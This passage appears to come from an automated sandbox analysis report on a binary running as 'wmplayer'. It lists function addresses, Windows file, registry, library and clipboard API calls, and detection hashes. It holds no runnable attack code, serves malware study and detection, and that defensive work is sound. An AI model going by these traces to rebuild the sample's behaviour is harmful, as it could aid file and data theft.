                                                                                            • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                            Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                            • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                            • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                            • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                            Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                            • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                            • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                            • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                            Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                            • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                            • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                            • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                            Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                            • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                            • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                            • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                            Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                            • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                            • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                            • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                            Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                            • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                            • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                            • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                            Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                            • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                            • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                            • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                            Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnumNamesResource
                                                                                            • String ID:
                                                                                            • API String ID: 3334572018-0
                                                                                            • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                            • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                            • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                            • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                            Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                            • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                            • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                            • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                            Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseFind
                                                                                            • String ID:
                                                                                            • API String ID: 1863332320-0
                                                                                            • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                            • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                            • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                            • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                            Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID:
                                                                                            • API String ID: 71445658-0
                                                                                            • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                            • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                            • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                            • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                            Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                            • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                            • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                            • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                            Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                            • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                            • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                            • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                            Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004095FC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                              • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                              • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 3655998216-0
                                                                                            • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                            • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                            • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                            • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                            Function 00415B2C Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                                                            • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                                                                            • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                                                            • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                                                                            Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00445426
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                            • String ID:
                                                                                            • API String ID: 1828521557-0
                                                                                            • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                            • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                            • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                            • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                            Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                              • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                            • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@FilePointermemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 609303285-0
                                                                                            • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                            • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                            • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                            • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                            Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp
                                                                                            • String ID:
                                                                                            • API String ID: 2081463915-0
                                                                                            • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                            • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                            • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                            • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                            Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateErrorHandleLastRead
                                                                                            • String ID:
                                                                                            • API String ID: 2136311172-0
                                                                                            • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                            • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                            • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                            • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                            Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@
                                                                                            • String ID:
                                                                                            • API String ID: 1936579350-0
                                                                                            • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                            • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                            • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                            • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                            Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                            • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                            • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                            • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                            Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                            • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                            • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                            • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                            Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                            • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                            • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                            • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

                                                                                            Non-executed Functions

                                                                                            Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EmptyClipboard.USER32 ref: 004098EC
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                            • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
